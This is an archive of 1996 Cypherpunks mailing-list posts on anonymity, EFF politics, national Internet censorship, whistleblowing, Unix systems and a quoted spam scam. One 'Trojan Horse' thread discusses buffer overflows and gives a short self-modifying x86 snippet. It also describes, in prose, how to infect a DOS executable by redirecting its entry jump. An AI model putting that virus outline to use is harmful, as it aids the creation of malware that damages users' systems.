To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: "Security risks" vs. "credit risks"
In-Reply-To: <199609010153.UAA22411@manifold.algebra.com>
Message-ID: <Pine.LNX.3.93.960902204518.967F-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Igor Chudov @ home wrote:
> Timothy C. May wrote:
> > than in Marianne Smith, retired school teacher from Peoria.
> > Remember, private airlines are just that: private. Surely we do not support
> > laws which limit a private airline from using data it has acquired to
> > decide whom to pay closer attention to. This is the essence of what
> > knowledge is.
> Unfortunately, most private businesses suck up to the government. It 
> is understandable if we note that they can be harassed by the government.
> Airlines, for example, are under tight and rather arbitrary control of 
> the FAA.

     Nail, Hammer, Head.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 3 Sep 1996 12:31:17 +0800
To: cypherpunks@toad.com
Subject: Re: mailing lists
In-Reply-To: <19960830.205359.4758.1.patrickbc@juno.com>
Message-ID: <Pine.LNX.3.93.960902204601.967H-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, patrick b cummings wrote:

> If any body knows any good mailings lists please tell me.
>                                                                          
>       -P. Cummings-
> Patrickbc@juno.com

     clueless@c2.org is pretty good. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 3 Sep 1996 16:18:21 +0800
To: cypherpunks@toad.com
Subject: Anonymity and free speech
Message-ID: <1.5.4.16.19960903035433.37773f1a@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain



Instead of discussing whether or not Esther Dyson or other EFF board members
are personally comfortable with anonymity, let's talk about whether or not
the EFF and its board members believe that the First Amendment provides a
right to speak and associate anonymously. (I believe that the First
Amendment gives everyone the right to wear a t-shirt which says "I am an
asshole." But I have no interest in wearing such a t-shirt. And so on.) 

I believe that it does, and that the Supreme Court has already made that
clear. In cypherpunks@toad.comparticular, I'm thinking of _NAACP v. Alabama
ex rel Patterson_, _Talley_, and _McIntrye v. Ohio Elections Commission_.
(Sorry for the lack of cites; 95% of my stuff is still in boxes and I'm
sending this via laptop and a Ricochet modem.)

If the right to speak/associate in "real life" is protected by the First
Amendment, I don't see why it wouldn't be on computers and networks which
are located inside the United States. And if that right is based upon the
Constitution, it will take a constitutional amendment or a big sea change in
the Supreme Court to take it away.
(I wonder if the decision in _McIntrye_ would have gone the other way if Ms.
McIntrye were selling drugs via anonymous message pools instead of
discussing school funding via windshield flyers.) Discussions about the
utility of anonymity would be more useful if we were designing a
communication system or a constituion from scratch; but that's not our
current situation. Is there serious debate about whether or not the
Constitution and the Internet allow anonymous communication? (I'm not asking
a rhetorical question. If someone's familiar with an argument to the
contrary, please tell me about it.) Both the Constitution and the Internet
are difficult to modify quickly; we probably have anonymity (like it or not)
for at least a few more years. 

(I'm not trying to imply that US law is the only law, or that the rest of
the world doesn't existy. But I don't know poo about the right to anonymity
in other nations; and to a certain extent anonymity anywhere on the Internet
is the same as anonymity everywhere on the Internet. Are other readers aware
of other jurisdictions where anonymous speech is considered a right?)
 
----
Greg Broiles
gbroiles@netbox.com
http://www.io.com/~gbroiles





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Tue, 3 Sep 1996 17:22:22 +0800
To: James Seng <cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.BSF.3.91.960902061444.12103A-100000@icg.irdu.nus.sg>
Message-ID: <9609022116.TE21076@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 2,  7:06, James Seng wrote:
> Subject: Re: DON'T Nuke Singapore Back into the Stone Age
> On Sat, 31 Aug 1996, Timothy C. May wrote:
> > The point is to make clear to them that the Usenet and similar Web sites
> > are global in nature, not subject to censorship without a very high local
> > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
> > Singaporans will have to choose not to carry the various newsgroups into
> > which *I* post such messages!
> 
> Just let to add my comment in regard to this unforuntate discusssion.
> 
> To understand the sitution better, you should not impose America 
> idealogy and perspection on how things to be done to Singapore. Singapore 
> maybe young but there are certain culture too.

Let me see, our "American idealogy" is blinding us to the wonderful 
government of Singapore which jails and tortures its citizens for 
expressing political views which might call the government of 
Singapore into question.

Check out, for example, this interview with the former Solicitor
General of Singapore.

http://www.unl.edu/scarlet/v5n33/v5n33qa.html

Nothing earth shattering at this URL - just what we all expect from a 
police state. 


-- 
Mark Henderson -- mch@squirrel.com, henderso@netcom.com, markh@wimsey.bc.ca
ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1  A1 2A 2A 06 4A D5 92 46
unstrip for Solaris, Wimsey crypto archive, TECO, computer security links,
change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 3 Sep 1996 05:39:03 +0800
To: cypherpunks@toad.com
Subject: Too few nymservers
Message-ID: <199609021918.VAA21564@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun 1 Sep 1996 Dave Harman OBC wrote :

[snip]
> There has to be more crypto anonymizing aliasing remailers and with 
> easier interfaces.  Closing the Kleinpaste derived server will help 
> put the pressure of demand to start better remailer systems.  
> There's not enough capacity and reliability with the servers extant.
> There should be thousands of full featured remailers.

Exactly.  Sometimes *all* the nymservers are down at the same time.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fran Frisina <franf@hhs.net>
Date: Tue, 3 Sep 1996 12:11:03 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <322BB272.442F@hhs.net>
MIME-Version: 1.0
Content-Type: text/plain


desubscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 3 Sep 1996 12:25:49 +0800
To: Christopher Carper <ccarper@microsoft.com>
Subject: Re: desubscribe
In-Reply-To: <c=US%a=_%p=msft%l=RED-78-MSG-960902172601Z-20683@tide19.microsoft.com>
Message-ID: <Pine.SV4.3.91.960902213058.24429F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


desubscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Tue, 3 Sep 1996 09:31:22 +0800
To: cypherpunks@toad.com
Subject: EFF chairwoman: Anonymity proven not to be a positive factor
Message-ID: <m0uxezC-0000ArC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>From a Scientology magazine:

   Esther Dyson, member of the board of directors of the Electronic
   Frontier Foundation and member of the National Information
   Infrastructure Advisory Council, spoke on the anonymity issue at the
   fifth Computers, Freedom & Privacy (CFP) conference in San Francisco.

[...]
                                      "I have a concern about the spread
   of bad behavior on the Net," said Dyson. "Anonymity figures into this,
   and I feel that it has proven to not be a positive factor. It breaks
   down the community which we are seeking to build, and cout protection
   and privacy laws already exist and should be applied in a broad way,
   such that they are transparent to new wrinkles in the technology. It
   is not necessary to view the world of the Net as different from the
   rest of the world."

http://www.anonymizer.com:8080/http://www.theta.com/goodman/hijack.htm


[For EFF's former position on anonymity, see
http://ftp.sterling.com:80/COAST/doc/law+ethics/EFF-Anonymity]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SPG <spg@dds.nl>
Date: Tue, 3 Sep 1996 09:28:28 +0800
To: cypherpunks@toad.com
Subject: FWD: Another try to kill democracy
Message-ID: <322B5766.60F8C2BB@dds.nl>
MIME-Version: 1.0
Content-Type: text/plain


Hi Y'all,

I just got wind that the German government is planning to force german
ISP's
to shut off access to my ISP, XS4ALL, because the german magazine
'Radikal'
has a web page on xs4all.

This magazine is a radical left wing magazine of the type that in the
netherlands 
is 13 in a dozen, and in germany (obviously) labelled 'terrorist'.

The issue here is not my political beliefs (quite distant from radical I
can
assure you) but the fact that the german government does NOT see fit to
extradite nazi war criminals, to fire Judges, DA's and other powerfull
officials who were member of the nazi party during WW2, or to take steps
towards closing access to US neo-nazi sites, but DOES deem it necessary
to
shut off an entire server 
because of a (in the netherlands perfectly legal) left wing magazine.

Not so much is changed after all I guess.

As student history I can name several people also labelled 'terrorist'
before by a government, who were not. 'Terrorist' is the name opressive
and
undemocratic Junta's use for their opposition.

Please considder mirroring or linking to this site.

THIS IS A MATTER OF PRINCIPLE!!
It has litle to do with the actual content of the page (wich is quite
harmless)

URL:
http://www.xs4all.nl/~tank/radikal/index.htm

or contact 

tank@xs4all.nl


REMEMBER! NEXT OPINION LABELLED 'UNWANTED' BY A GOVERNMENT,
MAY BE YOURS!!

Greetz.
DD.



--
--__+==[ NOTE!! This e-mail adress is read by several different
 people, due to the fact that it is in use as mailing adress
for our editorial staff (TRIBE MAGAZINE), If your message is of
a personal nature, and is not to be reposted or used in our
magazine , please state so. NOTE: we maintain the right to 
ignore this, if it has news value. ]==+--__




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 3 Sep 1996 18:59:29 +0800
To: cypherpunks@toad.com
Subject: Still more mileage from the old grey mare... was: Trojan Horse
In-Reply-To: <199609030151.SAA07328@toad.com>
Message-ID: <Pine.3.89.9609022139.A8426-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 2 Sep 1996, Bill Stewart wrote:

> >The key to the success is that the application in question has to be 
> >compromised to respond to these codes, either by design or by hacking. 
> >Either way the individual responsible must modify the execution 
> >mechanism, not just the data itself.
> 
> A well-written program is hard to exploit, but badly written programs
> can often be exploited in ways that allow execution of untrusted code.
> For instance, the fingerd bug exploited so spectacularly by Robert Morris
> handed a program more input that it was ready to accept, and the program
> stupidly kept writing the input into the array, past the end, and out
> into the stack, where it could be later interpreted as executable code.

That is one instance where it was obscure and workable. I am not familiar 
with the UNIX binary map, but in the Intel DOS world (includes Windows to 
a large degree), the stack generally lies at the top of DSEG, not CSEG  and 
flows down. Older incarnations of x86 allowed for such wonders as:

	push	ds
	push	cs
	pop	ds

	[ series of writes ]

	pop	ds

and viola, self modifying code by one method. Ugly, but it works. 
Variations on the same theme exist, now that Intel does not allow direct 
manipulation of the IP anymore. It's not that difficult to do. Some of the 
digital audio work I was involved in several years ago required modifying 
code sequencing on the fly to accomodate time delays and different types 
of processor performance.

Intel binaries are not difficult to modify directly - especially when 
they are DOS binaries (note the plethora of viruses in the medium). Even 
good code can be reworked without having source. One of the tricks is to 
grab the intial JMP off the binary header and point it down past the 
bottom of the existing binary towards the code you have added. This way 
on startup DOS does not truncate the new binary size via Function 31h. 
Now all you have to do is mudge the read section and look for your 
trigger before executing the additional code. What I have just described 
is a very simplistic viral mechanism.

> 
> If a popular GIF or JPEG interpreter was written that badly, you could 
> possibly devise a GIF that lies about how big it is and encourages
> the program to scribble on its stack.  Now, there probably aren't any
> like that, and it'd probably have to be Netscape or MSIE or Lview
> to be widespread enough to make an attack like that worthwhile.
> (I'd bet on MSIE, of the three of them :-)  Does Microsoft have some sort
> of Really Cool Extension to JPEG, allowing Macros for Self-Modifying JPEGs,
> trying to out-do Netscape's animated GIFs?)
> 

It wouldn't surprise me.

> >Let's see -current examples of computing items with this kind of a 
> >"feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the 
> >list keeps growing.
> 
> Back when Good Times came out, everyone denied that it was possible
> for there to be any risk from a text file (though, as I pointed out,
> escape-sequence hacks have been used occasionally for over 15 years),
> and not long after that, the MSWord Macro Viruses started appearing.
> Bad Code can't always be hacked usefully, but it can always be hacked...
> 
> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # <A HREF="http://idiom.com/~wcs"> 	
> # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto
> 

Escape sequence hacking in DOS has been done since the day ANSI.SYS came 
out to play. IT was a quick and dirty trick to send escape sequence laden 
files to the unsuspecting and ask them to type them to the screen. Then 
the fun began.

When you stop and think about it though, any application that functions 
as a data engine of some type is susecptible at some level to this form 
of attack. The issue is really which method to employ that will give you 
ROI. 

...Paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geek@algebra.com (Computer Geek)
Date: Tue, 3 Sep 1996 15:55:48 +0800
To: cypherpunks@toad.com
Subject: The most ridiculous SPAM in my lifetime
Message-ID: <199609030322.WAA13140@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


This is the American reincarnation of Ostap Bender.

Next spam from him will be about interplanetary chess congress,
no less I am sure.

Here's what his Web page says (excerpt): 

IRS> The Internet Registration Service Has Created An On-Line Service That
IRS>  Will Simultaneously Register Your Web Site With The Top 400 Internet
IRS>  Directories And Search Engines Operating On The Internet.
IRS> 
IRS>  The Proper Registration Of Your Web Site In These Directories And Search
IRS>  Engines Will Insure You That When Your Potential Customers Perform A
IRS>  "Net Search," Your Web Site Will Be Included In The "Search Results," And
IRS>  Your Web Site Will Become A Selection For Anyone Searching The Internet
IRS>  For The Products Or Services Your Company Sells.
IRS> 
IRS>  To Compete In This Fast Paced "Information Age" You Must Secure Your
IRS>  Place In As Many Of These Directories And Search Engines As Possible... If
IRS>  You Do Not... The Competition Will Simply Pass You By.
IRS> 
IRS>  In Order For You To Complete Your Internet Registration, All You Need To
IRS>  Do Is Complete The On-Line Registration Forms On The Following Pages
IRS>  And Submit Them To Our Offices Along With Your Registration Fee Of
                                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
IRS>  $395. You Can Pay Your Registration Fee By Credit Card, Or By Company
     ^^^^^^^
IRS>  Check. If You Are Paying By Check, Please Make Your Check Payable To:
IRS>  Internet Registration Service. And Mail It To:

>From nking@pvnet.com.mx  Mon Sep  2 22:13:17 1996
Return-Path: nking@pvnet.com.mx
Received: from galaxy.galstar.com (ichudov@galaxy.galstar.com [204.251.80.2]) by manifold.algebra.com (8.7.5/8.6.11) with SMTP id WAA13038 for <geek@algebra.com>; Mon, 2 Sep 1996 22:13:15 -0500
Received: from neptuno.pvnet.com.mx ([200.23.229.18]) by galaxy.galstar.com (8.6.12/8.6.12) with ESMTP id WAA07844 for <geek@algebra.com>; Mon, 2 Sep 1996 22:00:37 -0500
Received: from nking.pvnet.com.mx ([200.23.229.43]) by neptuno.pvnet.com.mx (8.6.12/8.6.12) with SMTP id VAA27361 for <geek@algebra.com>; Mon, 2 Sep 1996 21:59:40 -0500
Message-ID: <322B57BF.704@pvnet.com.mx>
Date: Mon, 02 Sep 1996 21:55:11 +0000
From: NORMAN KING <nking@pvnet.com.mx>
Reply-To: nking@pvnet.com.mx
Organization: Internet Registration Committee
X-Mailer: Mozilla 3.0b7Gold (Win95; I)
MIME-Version: 1.0
To: geek@algebra.com
Subject: IMPORTANT MESSAGE!!!
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

IMPORTANT MESSAGE!!!

Dear Sirs,

It Has Recently Come To The Attention Of The Internet Registration
Committee That Your Web-Site Has Not Been Properly Registered On The
Internet Or On The World Wide Web.

This Could Result In Your Potential Customers Being Unable To Locate 
You Or Find Your Web-Site On The World Wide Web. Proper Web-Site
Registration On The Internet Is Required In Order For Your Web-Site 
To Be Successful. 

There Are Currently More Than 400 Hundred Internet Directories And
Search Engines Operating On The Internet. It Will Be Necessary For You
To Register Your Web-Site With The Majority Of These Directories And
Search Engines In Order For Your Web-Site To Become Easily Located By
Your Potential Customers.  

If You Do Not Become Registered With A Large Number Of These Internet
Directories, Your Web Site Could Become Impossible For Your Customers 
To Locate, Your Web-Site Will Become Inaccessable, Therefore Becoming
Dormant, Unprofitable And Inactive.

In Order To Resolve This Situation, We Urge You To Contact Our Web-Site
Registration Service At The Internet Address Below By Clicking Your
Mouse On This Link:

                http://adgrafix.com/mail/irs.html


It Is Imperative That This Situation Be Resolved Immediately!

We Hope That We Can Help You To Resolve Your Registration Problem 
As Soon As Possible.


                        Thank-You,
                              Sincerely,

                                    NORMAN KING - Administrator 
                                   Internet Registration Service





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Tue, 3 Sep 1996 14:30:19 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609020630.XAA20578@toad.com>
Message-ID: <Pine.BSI.3.91.960902222126.19746B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ah yes, why don't we just destroy ALL culture, our way is ALWAYS better 
ISN'T it?  And those rainforest schmucks, what do THEY know... Screw 
those Africans who live simple lives, and fuck all the people who have 
dinner at 9 pm too while we're at it.

Let's just all assimilate and live happily ever after.

In the meantime, I'm trying to colonize a new planet.

-Millie\n

:: while :
   do
   echo 'you will be assimilated'\n
   done.

sfuze@tiac.net

PS: In case you didn't figure this out, I am VERY against people telling 
other people how to live.  "Sure it's okay if you want your freedom, as 
long as you live like us..."  -- some list on privacy guys. Next, 
everyone will have to wear the same underwear sizes and speak the same 
language (hint: ENglish is NOT the most spoken language in the world.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Tue, 3 Sep 1996 16:25:30 +0800
To: hallam@ai.mit.edu
Subject: Re: SCO giving free licenses to UNIX OpenServer
Message-ID: <199609030411.XAA28740@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: hallam@ai.mit.edu, cypherpunks@toad.com
Date: Mon Sep 02 23:01:35 1996
> > 
> > I doubt it.  People don't use Microsoft products because
> > of their quality or functionality.
> 
> Errmm.. hate to disappoint but SCO UNIX started life as Xenix which
> was written by Microsoft in the dark ages. 
> 

Concur.  Microsoft products are used not necessarily because of
quality or functionality (which are often dubious, but
very occasionally present), but because of user interface and/or
market share.

> Today Linux probably represents the future of the UNIX familly, it
> allows people who want to hack at the OS level access to the sources
> of a fully functioning OS. This allows people to add in new kernel
> features, schedulers and other exotica without having to write a
> whole new O/S.

I still like FreeBSD.  Similar functionality, similar availability-
of-source, but very slightly easier to install/run/manage/play with.
Similarly free.

(FreeBSD was able to find my modem, something I couldn't get Linux
to do after most of an hour.  Of course I'm a *nix novice for the
most part.)

> Just don't confuse it with "home computing", this is geek computing
> and you better have a lot of interest in computing to use it. Home
> computing is the market for users who need a system thats simpler
> than a VCR or they can't use it. At one time that meant Apple, today
> it means Microsoft, it will never mean Linux - not unless someone
> can make Linux much much simpler than it is at present and provide
> decent WISIWIG tools such as editors etc. designed for use by aunt
> Ethel.

I'm not sure about that... X-Windows seems to have a decent interface,
runs on Linux, hell, most any *nix you care to name, and has some
decent editors available.  (Or, there's always emacs, but aunt
Ethel might not grok emacs too well.  I don't :)



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Ask not what you can do for your country;
 ask what your country did to you" -- KMFDM, "Dogma"
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMiutozVTwUKWHSsJAQEdCgf+OM8tpEbJh/FonjORnFwe9lo2t+my8eD7
+oM7Gv/WMPekDhvxxolzqGSvgUAJL1sgbwKdray5fHFCwOtK1ogQJrN4qrXKQH5e
IXlC+G91i5BUq98MmzsEngZ3Akz2YciY/U4zyEJSXUNigAFgGcuXhZ1Bw+HT3hLt
x27h45wWxHWfUJR8EUgOiUDG41rTW3eSLN0Pf/cSyvMTE3c+ub+59SMYJzCO+DnK
MjNfhKvFLVNPUGJYNfLGt3OzwJFaCLnuDKLI78R0W+MsCqSA02o4Mq8GRul78Dfi
jgBNJEsP8JdZnQTheRCwR4cgwIHc/Csmu+Ab5UN8h5L7VV1u2YFfkA==
=PgX+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 17:57:01 +0800
To: cypherpunks@toad.com
Subject: Re: Whistleblowing on the Internet
Message-ID: <199609030615.XAA15838@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 PM 9/2/96 EDT, "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> wrote:
>There's also the point that some whistleblowing isn't exactly
>what some political groups would want to occur. For instance, opponents
>to unions such as myself aren't going to want a whistleblower to be able
>conveniently to report their exclusion from a job due to union membership.

While some unions are clearly run by and for thugs, some employers have
also hired thugs to attack union organizers, and both unions and employers
have convinced government thugs to attack their opponents, though unions
generally have convinced governments to write laws with fines attached,
while employers have often had actual Federal troops shooting union strikers,
and have had police refrain from defending strikers from attack.

In a free market, there wouldn't be laws requiring or forbidding union
membership, and some unions would prosper by providing good service to their
members and to the employers that hire them, while others wouldn't.

I'd be happy to see union members able to anonymously blow the whistle on
employers that blacklist union members, though it's harder to be credible
with the public if you're anonymous, and particularly hard to get people to
believe
"Employer MegaFooBar refused to hire [name deleted for privacy], 
a member of the IBCPARO, because of his union membership" without
revealing enough about the union member's identity that the employer knows,
and therefore telling all other employers to know that the guy is not
only a union member, but also a troublemaker.

In this case, the technology is more strongly useful for maintaining
blacklists than for detecting or outing blacklist users.
Unfortunately, that's especially true because government taxation and
anti-immigrant policies require that employees provide employers with
a [mostly] unique ID number and papers to prove who they are,
so you can't just show up at a construction-workers' hiring hall,
call yourself Joe, and get your pay in cash at the end of the day.
(Unless you're already an illegal immigrant, in which case it works fine,
but then it's tough to be a union member.)


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 18:00:47 +0800
To: cypherpunks@toad.com
Subject: Re: Whistleblowing on the Internet
Message-ID: <199609030615.XAA15843@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Geoffrey Gussis wrote:
>| Overall, I am quite surprised that there isn't a whistleblowing
>| clearinghouse on the Internet; a site sponsored by a non-profit that lists
>| email addresses and secure forms for sending anonymized email to those
>| areas of the public and private sector that deal with whistleblowing. 

Alt.whistleblowing was started a while ago, and was probably
pretty quiet (not that I've read it in years.)  Of the 5 articles there today,
one is from Geoffrey Gussis, one is a reply, one has an EPA phone number,
one is test, and one is spam.  The reply said
#> See www.taf.org on the net.
#> See www.whistleblowers.com on the net
#> In a few weeks, our site will be up, and we are also 
#> involved in bringing false claims act or whistleblower 
#> lawsuits.  We have one under seal, and three more pending.

>	Such a clearinghouse is what we call a fat target; something
>likely to attract attention since wiretapping it could be very useful
>to an organization that worried about having a whistleblower.

That kind of wiretapping we can deal with.    Forging Usenet headers
was easy enough even without anonymous remailers, and chaining
encrypted messages through remailers should be adequate, even
without the huge mix volume of anon.penet.fi.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 17:46:24 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609030615.XAA15848@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> wrote:
>> > > What is or is not your personal or EFF's official position is
meaningless.
>> > > It is clear that the personal beliefs of those involved in EFF are
>> > > those of compromise, present day politics, and a general lack of moral
>> > > fiber.

While nobody's called Esther Dyson a Communist here yet, there are
people on the board I disagree with - Mitch Kapor, in particular, has shown
signs of being a (gasp!) Democrat!  My initial reaction to the EFF's first
year or two was that they were doing some very good things 
(the Steve Jackson defense), and also had people making speeches about
the need to provide everybody with access to the Information SuperHighway.
Getting the S.266 anti-crypto-pro-wiretapping bill killed a few years
ago was what convinced me to join them, though their compromise positions
on some of the other anti-freedom bills since then have not helped
my mixed views of the organization.  With all due respect to Jerry Berman,
I'm more comfortable now that they're not Washington Insiders any more.

>Why am I any more mistaken  for pointing out that a single influential
>member of EFF's staff or board is anti-anonymity and yet remains with the
>organization than you are for pointing out that a single influential
>member who happened to be anti-anonymity has left?
....
>Maybe there should be an EFF position on the matter.

Maybe.  If it's a good position, it will recognize that anonymity
is a mixed blessing; there are people who use it creatively and
responsibly, like Black Unicorn and Lucky Green, and there are
spammers who abuse it to the detriment of society, like the slimeball
who used my remailer to post hatemail to the gay newsgroups with
somebody else's name attached to the bottom.  On the other hand,
free speech is also a mixed blessing; there _are_ things I wish people
had the good taste not to say, but I'm not going to get in Voltaire's
way while he defends to the death their right to say them...


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 3 Sep 1996 16:04:32 +0800
To: cypherpunks@toad.com
Subject: POT_hot
Message-ID: <199609022339.XAA08162@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Foreign Affairs, Sep/Oct, Lead Essay: 
 
   "Postmodern Terrorism. The terrorism of the future may be 
   far more destructive than terrorism as we have known it." 
    
   An informative survey and pot-heat by Walter Laqueur. 
 
      Terrorism's prospects, often overrated by the media, 
      the public, and some politicians, are improving as its 
      destructive potential increases. Terrorism has 
      replaced wars between nations of the 1800s and 1900s. 
 
      In the future, terrorists will be individuals or 
      like-minded people working in very small groups. An 
      individual may possess the technical competence to 
      steal, buy, or manufacture the weapons he or she needs 
      for a terrorist purpose. The ideologies such 
      individuals and minigroups espouse are likely to be 
      even more aberrant than those of larger groups. And 
      terrorists working alone or in very small groups will 
      be more difficult to detect unless they make a major 
      mistake or are discovered by accident. 
 
      Society has also become vulnerable to a new kind of 
      terrorism, in which the destructive power of both the 
      individual terrorist and terrorism as a tactic are 
      infinitely greater. The advanced societies of today 
      are more dependent every day on electronic 
      information. That exposes enormous vital areas of 
      national life to mischief or sabotage by any computer 
      hacker, and concerted sabotage could render a country 
      unable to function. 
 
      Why assassinate a politician or indiscriminately kill 
      people when an attack on electronic switching will 
      produce far more dramatic and lasting results? If the 
      new terrorism directs its energies toward information 
      warfare, its destructive power will be exponentially 
      greater than any it wielded in the past -- greater 
      even than it would be with biological and chemical 
      weapons. The single successful one could claim many 
      more victims, do more material damage, and unleash far 
      greater panic than anything the world has yet 
      experienced. 
 
   ----- 
 
   http://jya.com/pothot.txt  (30 kb) 
 
   POT_hot  (in 2 parts) 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 3 Sep 1996 05:00:15 +0800
To: rishab@dxm.org
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <1.5.4.32.19960902174507.0032cf14@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 15:18 01/09/96 -0700, Rishab Aiyer Ghosh wrote:
>Arun Mehta wrote:
>> and India will be too: the law here holds the ISPs responsible
>> for ensuring that nothing objectionable and obscene is carried by
>> them, and what simpler way to comply than to
>
>FWIW: "There is no need to licence content providers; Internet
>service providers are not responsible for illegal content." R K
>Takkar, Indian Telecom Secretary (at the time of interview)

What Mr. Takkar says isn't law, plus he's gone. The law clearly
holds ISPs responsible for
content: when it suits the government it will pull it out.
Doesn't even have to be the government: some headline-seeking
opposition politician could take the government to task because
the government-run ISPs aren't complying with the law.

And please don't get lulled into complacency by a stupid law that
isn't being enforced: in 1975, Indira Gandhi pulled out a host of
them to *legally* impose dictatorship.

>> Ideally, I should be able to 
>> send via pgp and anonymous remailer a request for a page, which would soon
>> come beamed down unencrypted via satellite. No more waiting hours
>> for the latest version of Netscape to download
>
>(!) you'll only have to wait hours for your anonymous-remailer-web-to-e-mail
>gateway, EVERY time you want a page. 

every time I want a BANNED page -- I'd say it's worth it. In the
process of accessing it, I also show it to everyone in Asia, thus
giving the banned stuff much more publicity than it otherwise
would get on the net.

>governments will 
>eventually see sense and stop censorship, if they're interested in
>making their countries rich. Singapore in every other field of work
>has shown its interest in deregulation; I would expect them to do so
>on the Net as well, when it becomes clear that there's rather more to
>it than porn and subversion.

Governments everywhere (see Declan's long list) seem to think
they can separate out the porn and subversion from the "rather
more". Just as in the German case, where the Zundel-site was
mirrored so that Germans could access  it, external measures to
help Singaporeans access what they like would certainly help
their government "see sense."

>In the meanwhile, there's not much point 
>trying to "help" them, apart from providing moral support.

Guess I'll risk being accused of indulging in cliches when I cite
the famous Niemoeller quote once more which begins, " First they
came for the communists, and I did not speak out, for I was not
one"... and ends "And then they came for me. There was no one
left to say anything..."

Freedom is won and lost in inches, and you have to fight every
single inch they try to take away. 

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





